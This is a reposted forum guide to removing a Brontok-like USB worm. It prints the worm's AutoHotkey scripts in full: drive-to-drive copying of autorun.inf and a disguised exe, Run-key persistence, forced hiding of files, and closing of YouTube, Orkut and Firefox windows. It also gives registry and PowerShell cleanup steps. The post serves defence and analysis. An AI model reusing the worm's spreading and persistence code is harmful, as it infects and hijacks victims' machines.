Posted by 寂寞的枯叶 on 1-8-2008 13:37
[Repost] Brontok variant (the one that keeps you out of YouTube): complete fix guide
I just caught a virus. I had been fiddling around with things, it is cleaned up now, so I can study it on my own.
The virus itself, like the Brontok of years ago, is a yellow folder named MicrosoftPowerPoint. It is actually an .exe file that uses the system folder icon as a disguise, and it travels together with an autorun.inf.
After I clicked the exe, it created an exe of the same name in every one of your folders and left a hidden folder named heap41a on the C drive (this is the virus's base). Because the infection changes your Folder Options to "do not show hidden files", you must first recover your Folder Options.
Method 1:
Open Notepad and copy and paste the following text (the dword values are written with the full 8 hex digits that regedit expects):
REGEDIT4
;Fix Folder Options and Show Folder Check
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"Checkedvalue"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
Then Save As:
Save as type: All Files
File name: FCheck.reg
When done, double-click the file.
Method 2:
Use 病毒防御者 (a Chinese "Virus Defender" utility): choose Repair Tools >> Repair System Tools >> on the right, select "Repair show all files and folders".
OK, now set your system to show all hidden files.
Illustrated explanation (the original post had screenshots):

1. On the C drive you will see the heap41a folder; inside it is the offspring folder, which is the virus's base (autorun.inf and the MicrosoftPowerPoint exe). This is also why, every time you delete the autorun.inf on your pendrive, it comes back later: your system has been instructed to copy an autorun.inf onto your drive.
2. reproduce.txt
#notrayicon
#persistent
; read the drive letters (c..z) from driveList.txt into Array1..ArrayN
ArrayCount = 0
Loop, Read, C:\heap41a\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
; run the reproduce label every 5 seconds
settimer,reproduce,5000
return

reproduce:
Loop %ArrayCount%
{
    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
    {
        driveget,data1,status,%element%:\
        ifequal,data1,Ready
        {
            ; copy offspring (autorun.inf + MicrosoftPowerPoint.exe) to the drive root
            FileCopydir,C:\heap41a\offspring,%element%:\,1
        }
    }
}
; persistence: re-create the Run value if it has been removed
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
    Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

The script above reads driveList (driveList contains c, d, e ... y, z) and then reaches FileCopydir,C:\heap41a\offspring,%element%:\,1 >> that is, it copies the autorun.inf and MicrosoftPowerPoint.exe from the offspring folder into the listed drives (the checks above it limit this to removable drives that are ready). After that it writes C:\heap41a\svchost.exe C:\heap41a\std.txt into HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run, value winlogon.
First delete the whole heap41a folder. Open Task Manager, and under Processes select svchost.exe (the one marked AutoHotKey), then End Process. Next, go to Run, type regedit, and delete the registry value mentioned above.
3. std.txt
#notrayicon
#singleinstance,ignore
; force "do not show hidden files" back on whenever it has been turned off
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
    regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
; launch the other two scripts with the renamed AutoHotkey interpreter
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
This script is why, after you set "show hidden files", it goes back to "do not show hidden files". The FCheck.reg above already changes HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL >> Checkedvalue back to 1.
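As an added example that is not part of the original post (nor of any tool it mentions), here is a PowerShell script that automates the cleanup steps described above: it stops the AutoHotkey interpreter started from C:\heap41a, removes the winlogon value under Policies\Explorer\Run that reproduce.txt keeps re-creating, restores the SHOWALL CheckedValue and NoFolderOptions values that FCheck.reg fixes, deletes C:\heap41a, and removes autorun.inf and MicrosoftPowerPoint.exe from the root of every drive. Every path and value name comes from the post; the -ReportOnly and -DeepScan switches and the Write-Step helper are my own. Run it from an elevated PowerShell, with -ReportOnly first to see what it would change.

```powershell
# Added cleanup example for the heap41a variant described in the post.
# Not the post's own code; paths and value names are taken from the post.
[CmdletBinding()]
param(
    [switch]$ReportOnly,   # only report findings, change nothing
    [switch]$DeepScan      # also search every drive for dropped copies (slow)
)

$Base    = 'C:\heap41a'                              # staging folder named in the post
$RunKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
$RunName = 'winlogon'                                # value name written by reproduce.txt
$ShowAll = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$PolicyKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
)
$DroppedFiles = @('autorun.inf', 'MicrosoftPowerPoint.exe')   # contents of the offspring folder

function Write-Step([string]$Message) { Write-Host "[*] $Message" }

# 1. Stop the AutoHotkey interpreter that was renamed to svchost.exe.
#    The real svchost.exe lives in System32, so match on the command line instead of the name.
#    This must happen before the registry and file cleanup, otherwise reproduce.txt
#    re-creates the Run value within 5 seconds and the files stay locked.
Write-Step "Looking for processes started from $Base"
Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -and $_.CommandLine -match [regex]::Escape($Base) } |
    ForEach-Object {
        Write-Step "PID $($_.ProcessId): $($_.CommandLine)"
        if (-not $ReportOnly) { Stop-Process -Id $_.ProcessId -Force }
    }

# 2. Remove the persistence value (Policies\Explorer\Run\winlogon).
if (Test-Path $RunKey) {
    $val = (Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue).$RunName
    if ($val) {
        Write-Step "Run value '$RunName' = $val"
        if (-not $ReportOnly) { Remove-ItemProperty -Path $RunKey -Name $RunName }
    }
}

# 3. Restore folder options (same effect as FCheck.reg in the post).
Write-Step "Restoring 'show hidden files' and the Folder Options menu"
if (-not $ReportOnly) {
    if (Test-Path $ShowAll) {
        Set-ItemProperty -Path $ShowAll -Name 'CheckedValue' -Value 1 -Type DWord
    }
    foreach ($k in $PolicyKeys) {
        if (Test-Path $k) { Set-ItemProperty -Path $k -Name 'NoFolderOptions' -Value 0 -Type DWord }
    }
}

# 4. Delete the staging folder (hidden/system attributes need -Force).
if (Test-Path $Base) {
    Write-Step "Found $Base (contains driveList.txt, offspring\, the scripts and 2.mp3)"
    if (-not $ReportOnly) { Remove-Item -Path $Base -Recurse -Force }
}

# 5. Remove the copies that FileCopyDir dropped into the root of each drive.
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    foreach ($name in $DroppedFiles) {
        $p = Join-Path $drive.Root $name
        if (Test-Path -LiteralPath $p) {
            Write-Step "Dropped file: $p"
            if (-not $ReportOnly) { Remove-Item -LiteralPath $p -Force }
        }
    }
    # Optional: the post says the exe is also planted inside other folders.
    # Real PowerPoint is POWERPNT.EXE, so a file with this name is suspect anywhere.
    if ($DeepScan) {
        Write-Step "Searching $($drive.Root) for further copies of MicrosoftPowerPoint.exe"
        Get-ChildItem -Path $drive.Root -Recurse -Force -Filter 'MicrosoftPowerPoint.exe' -File -ErrorAction SilentlyContinue |
            ForEach-Object {
                Write-Step "Copy: $($_.FullName)"
                if (-not $ReportOnly) { Remove-Item -LiteralPath $_.FullName -Force }
            }
    }
}
Write-Step "Done. Reboot and confirm the Run value has not come back."
```

The order deliberately differs from the post's step list: the running script is stopped first, because as long as svchost.exe (AutoHotkey) is alive, reproduce.txt rewrites the Run value every 5 seconds and std.txt can flip the hidden-files setting back. Check the Run key once more after a reboot; if the value reappears, a copy of the interpreter is still being launched from somewhere.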
4. script1.txt
#persistent
#notrayicon
; check the active window every 2 seconds
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
ifinstring,ed,youtube
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
ifinstring,ed,Mozilla Firefox
{
    winclose %ed%
    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r        OR ELSE...,30
    return
}
; for Internet Explorer, also inspect the text of the first four edit controls (address bar etc.)
ifwinactive ahk_class IEFrame
{
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
}
return
This file is why you cannot get into YouTube, and why, when you use Firefox, you see strange messages telling you to use IE. See the 2.mp3? That is an audio file: a sinister laugh.
Postscript:
When you get infected, please don't immediately insist on formatting; much of the time we can bring the system back with a few simple settings!